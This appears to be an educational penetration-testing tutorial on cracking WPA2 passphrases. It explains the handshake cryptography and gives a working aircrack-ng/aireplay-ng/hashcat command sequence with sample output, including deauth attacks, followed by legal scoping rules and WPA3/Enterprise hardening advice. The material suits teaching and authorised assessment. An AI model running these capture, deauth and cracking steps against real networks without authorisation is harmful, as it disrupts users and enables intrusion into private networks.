WPA2 and the Handshake

WPA2 (Wi-Fi Protected Access 2) is the standard encryption protocol for wireless networks. When a client connects to a WPA2 network, it performs a four-way handshake with the access point to establish an encryption key. This handshake can be captured by anyone within radio range — and once captured, can be cracked offline using a dictionary attack.

The critical weakness: the passphrase is not transmitted during the handshake, but the handshake contains enough information to verify whether a guessed passphrase is correct. This enables offline brute forcing without any further interaction with the target network.

Why Wireless Security Assessment Matters

Wireless network security is a standard component of penetration testing engagements for organisations with physical premises. A compromised wireless network provides network-layer access equivalent to a physical Ethernet connection — bypassing perimeter firewalls, reaching internal servers, and potentially the internal Active Directory domain. An attacker who cracks a WPA2 passphrase from a parking lot has the same access as an employee plugging in at their desk.

The stakes are particularly high in environments where the wireless network bridges into sensitive infrastructure: corporate networks, industrial control systems, medical devices, or point-of-sale systems. A weak passphrase on any of these is a network-layer entry point that no amount of server-side security can compensate for.

Capture and Crack

The attack has two phases: capture the four-way handshake (by monitoring for a client connecting, or by forcing a reconnect with a deauth packet), then run a dictionary attack against the captured handshake offline.

Phase 1  Put wireless card in monitor mode
Phase 2  Capture traffic on target channel
Phase 3  Capture the 4-way handshake (wait or deauth)
Phase 4  Run dictionary attack against .cap file offline
Phase 5  Recovered passphrase → join the network

WPA2 Cracking in Practice

iwconfig                    # find wireless interface (e.g. wlan0)
airmon-ng start wlan0       # enable monitor mode → creates wlan0mon
airodump-ng wlan0mon        # scan for nearby networks
BSSID              CH  ENC   ESSID
AA:BB:CC:DD:EE:FF   6  WPA2  TargetNetwork

# Capture on target channel and BSSID:
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Speed it up — send deauth to force client reconnect:
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
WPA handshake: AA:BB:CC:DD:EE:FF  ← captured!

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Opening capture-01.cap
Read 1234 packets.
#  BSSID              ESSID       Encryption
1  AA:BB:CC:DD:EE:FF  TargetNet   WPA (1 handshake)

Aircrack-ng 1.7
KEY FOUND! [ wifi2023 ]

hcxpcapngtool capture-01.cap -o capture.hc22000
hashcat -m 22000 capture.hc22000 rockyou.txt
Speed: 1,234,567 H/s   ← 1.2 million attempts/sec on GPU
AA:BB:CC:DD:EE:FF:wifi2023

What You Need to Know

The Four-Way Handshake — Under the Hood

Understanding why the four-way handshake is vulnerable to offline cracking requires understanding what it actually does cryptographically. The handshake is not transmitting the passphrase — it is establishing a shared session key through a challenge-response protocol. The weakness is that the verification material embedded in the handshake is derived from the passphrase in a way that makes it checkable offline without the passphrase ever being disclosed.

Key Derivation Chain: Passphrase → PMK → PTK

The WPA2 key hierarchy has two levels. The first is the Pairwise Master Key (PMK), which is derived from the passphrase using PBKDF2 (Password-Based Key Derivation Function 2) with HMAC-SHA1, iterated 4,096 times, with the SSID (network name) as the salt. The output is a 256-bit key that represents a "long-term" secret for this particular client-network pair.

The second level is the Pairwise Transient Key (PTK), which is derived from the PMK along with two random nonces (one from the AP, one from the client) and both MAC addresses. The PTK changes with every session and is used to encrypt actual data traffic. The four-way handshake exchanges the nonces needed to derive the PTK on both sides, and includes a Message Integrity Check (MIC) that proves both parties derived the same PTK — which in turn proves both parties know the same PMK — which proves both know the correct passphrase.

# Step 1: PMK derived from passphrase + SSID
PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits)
# The SSID is the salt — "TargetNetwork" produces a different PMK
# than "HomeWifi" even with the same passphrase.
# This prevents pre-computed rainbow tables across all networks.

# Step 2: PTK derived from PMK + nonces + MAC addresses
PTK = PRF-512(PMK, "Pairwise key expansion",
              AP_MAC || Client_MAC || ANonce || SNonce)

# Step 3: MIC computed to verify both parties share the PMK
MIC = HMAC-MD5(PTK[0:16], EAPOL_frame)
# The MIC is included in the handshake frames.
# Attacker captures: ANonce, SNonce, both MACs, and the MIC.
# For each candidate passphrase, attacker recomputes:
#   1. PMK from candidate + captured SSID
#   2. PTK from PMK + captured nonces + captured MACs
#   3. MIC from PTK + captured frame
#   4. Compare computed MIC to captured MIC — match = found!

Why PBKDF2 with 4096 Iterations Isn't Enough

When WPA2 was designed, 4,096 PBKDF2 iterations were chosen to make brute-forcing computationally expensive. In 2003, when the standard was finalised, consumer hardware could compute roughly tens of thousands of PMKs per second. The iteration count made a meaningful dent in attack speed.

Modern GPU hardware has fundamentally changed this calculation. A consumer-grade GPU in 2025 can compute approximately 400,000 to 1,000,000 WPA2 PMK derivations per second per GPU. A mid-range cracking rig with four GPUs tests 4–8 million passphrases per second. The 4,096-iteration cost that was once a meaningful barrier is now effectively irrelevant for dictionary attacks, which don't need to exhaust the keyspace — they only need to find a weak passphrase near the top of a well-curated wordlist.

Entropy, Cracking Speed, and Why Passphrase Length Matters

The fundamental question a security professional must be able to answer is: "How strong does a WPA2 passphrase actually need to be?" The answer requires understanding password entropy — the measure of unpredictability in a passphrase — and mapping it to realistic cracking speeds.

Entropy Calculation

Password entropy is measured in bits and calculated as: log₂(character_set_size) × password_length. A passphrase drawn from a larger character set or consisting of more characters has higher entropy and takes exponentially longer to crack by brute force. Dictionary attacks collapse this — a word from rockyou.txt has near-zero entropy regardless of character count because the attacker doesn't need to try the full keyspace.

The table illustrates a counterintuitive truth: "P@ssw0rd!" — which looks complex — is actually weaker in practice than "correct horse battery" — which looks simple. The substitution patterns (@ for a, 0 for o, ! at the end) are so well-known that every serious cracking wordlist includes rule sets that generate them automatically. Predictable complexity is not entropy.

The Dictionary Attack Model vs Pure Brute Force

Understanding the difference between dictionary attacks and brute force is important for accurate security advice:

• Pure brute force tries every possible character combination in sequence. Against a 16-character passphrase using the full printable ASCII character set (95 characters), this is 95¹⁶ ≈ 4.4 × 10³¹ combinations — computationally infeasible against any modern hardware for the foreseeable future.
• Dictionary attacks test candidates from a pre-built wordlist. The rockyou.txt list contains approximately 14 million entries — all tested in seconds on a GPU. Extended wordlists with billions of entries from multiple breach databases take minutes to hours.
• Rule-based attacks apply transformation rules to dictionary words (capitalise first letter, append numbers 0–99, replace a with @, etc.), expanding a 14-million-word dictionary into billions of candidates that cover the vast majority of human-chosen passwords.

The practical conclusion for security assessors: for a WPA2 network with a human-chosen passphrase, the realistic threat model is dictionary and rule-based attacks, not pure brute force. The question "is this passphrase secure?" is really "is this passphrase in any wordlist, or derivable from one via rule transformation?" A 20+ character truly random passphrase is immune to both. A 20-character passphrase built from recognisable words with predictable substitutions may not be.

Wireless Security Assessment — Legal and Professional Context

No tool in this lab series is more legally sensitive in practice than wireless capture tools. The reason is architectural: unlike web application testing or network scanning — which target systems you're connected to and can scope by IP address — passive wireless capture operates on shared radio spectrum. Your wireless card in monitor mode captures packets from every network within range, not just the one you're authorised to assess. This creates genuine legal complexity that practitioners must understand before conducting any wireless assessment.

The Authorisation Requirement

Wireless security assessments require the same written authorisation as any other penetration test — and the scope document should specifically address wireless testing. A general "you have permission to test our network" authorisation does not automatically cover wireless assessment because the physical radio environment may include networks operated by third parties (neighbours, other tenants in a shared building, nearby businesses) that you have no authorisation to test and may inadvertently capture.

Professional wireless assessment engagements typically include:

• Specific SSID/BSSID scope: The authorisation lists exactly which networks by BSSID (MAC address) are in scope. Any network not on the list is off-limits, regardless of physical proximity or apparent association with the client.
• Physical access control: Testing is conducted from within the client's property boundary, not from a public car park, to minimise capture of third-party networks.
• Rules for out-of-scope discovery: If testing reveals a network that appears to belong to the client but isn't in scope, it is documented and reported — not tested.
• Deauthentication disclosure: Sending deauth frames is an active attack that disrupts all clients connected to the target network, not just those directly involved in the handshake capture. This service disruption must be explicitly authorised and coordinated with the client — typically restricted to maintenance windows.

What a Professional Wireless Assessment Actually Covers

Wireless security assessments in professional engagements are far broader than passphrase cracking. Passphrase strength is one finding category among many. A complete wireless assessment typically covers:

• Authentication protocol assessment: WPA2-Personal (PSK) vs WPA2-Enterprise (802.1X/RADIUS). Enterprise mode eliminates the shared-passphrase attack surface entirely — each user authenticates with individual credentials.
• Rogue access point detection: Unauthorised APs connected to the wired network, or "evil twin" APs that mimic legitimate SSIDs to intercept traffic.
• Client security assessment: Whether clients accept certificates from unknown CAs, whether they probe for SSIDs that could be exploited by rogue APs, and whether they maintain connections to unencrypted networks.
• Network segmentation validation: Whether the wireless network is properly isolated from sensitive internal segments, or whether wireless access provides unfiltered access to the same network as wired devices.
• WPA3 transition readiness: Whether the infrastructure supports WPA3 and what migration path is available.

WPA3, SAE, and the Complete Defensive Picture

Understanding what WPA3 changes — and what it doesn't — is essential for giving accurate security advice and for understanding what improvements organisations should be prioritising in their wireless infrastructure.

WPA3-Personal — Simultaneous Authentication of Equals (SAE)

WPA3's most significant improvement over WPA2 for personal/home networks is the replacement of the four-way handshake with SAE (Simultaneous Authentication of Equals), also known as Dragonfly. SAE is a cryptographic protocol from the family of Password Authenticated Key Exchange (PAKE) protocols that fundamentally changes the security model in two ways:

Forward secrecy: Each SAE authentication session generates a fresh, unique PMK even if the same passphrase is used. Capturing the SAE handshake from one session provides no useful material for cracking — there is nothing in the exchange that encodes the passphrase in a checkable form. Even if an attacker later learns the passphrase, they cannot retrospectively decrypt captured traffic from a previous session.

Offline attack resistance: SAE's design means the verifier (access point) actively participates in each authentication attempt. An attacker cannot take captured data home and test passphrases offline at GPU speed — they would need to interact with the AP for each guess, and APs implement rate limiting and lockout after failed attempts. This reduces the attack to at most a few thousand guesses rather than billions.

WPA2-Enterprise — The Right Answer for Organisations

For enterprise environments, WPA2-Enterprise (802.1X authentication with a RADIUS server) addresses the shared-passphrase weakness of WPA2-Personal entirely — not by improving the handshake, but by eliminating the shared passphrase in the first place. Each user or device authenticates with their own credentials (username/password, certificate, or smart card), validated by a central RADIUS server.

This means there is no single shared secret that an attacker could capture and crack. Compromising one user's credentials compromises only that user's wireless access, not the entire network. Certificate-based 802.1X also provides strong mutual authentication — clients verify the RADIUS server's certificate before transmitting credentials, preventing certain rogue AP attacks that capture credentials by impersonating the legitimate network.

Practical Hardening Recommendations

• Minimum passphrase length 20+ characters: For WPA2-Personal networks, this is the single most impactful control. At 20 random characters, dictionary and rule-based attacks become computationally infeasible even with large wordlists. Use a password manager to generate and store it — humans should not be trying to memorise 20-character random strings.
• Migrate to WPA3 where hardware supports it: Most access points manufactured after 2020 support WPA3. Enable WPA3-SAE/WPA2 transition mode to maintain compatibility with older client devices during migration.
• Deploy WPA2/3-Enterprise for corporate environments: 802.1X with RADIUS eliminates the shared passphrase attack surface and provides per-user credential management and audit trail.
• Network segmentation: Ensure the wireless network is isolated from sensitive internal infrastructure by a properly configured firewall. Wireless access should reach the internet and specifically authorised internal resources, not the entire internal network as a flat layer-2 broadcast domain.
• Rogue AP monitoring: Deploy wireless intrusion detection (WIDS) to alert on unauthorised access points appearing within the radio environment. Most enterprise wireless controllers include this capability.
• Regular passphrase rotation for PSK networks: Change WPA2-Personal passphrases on a schedule and immediately following any personnel departure who had access to the passphrase.

Core Concepts Summary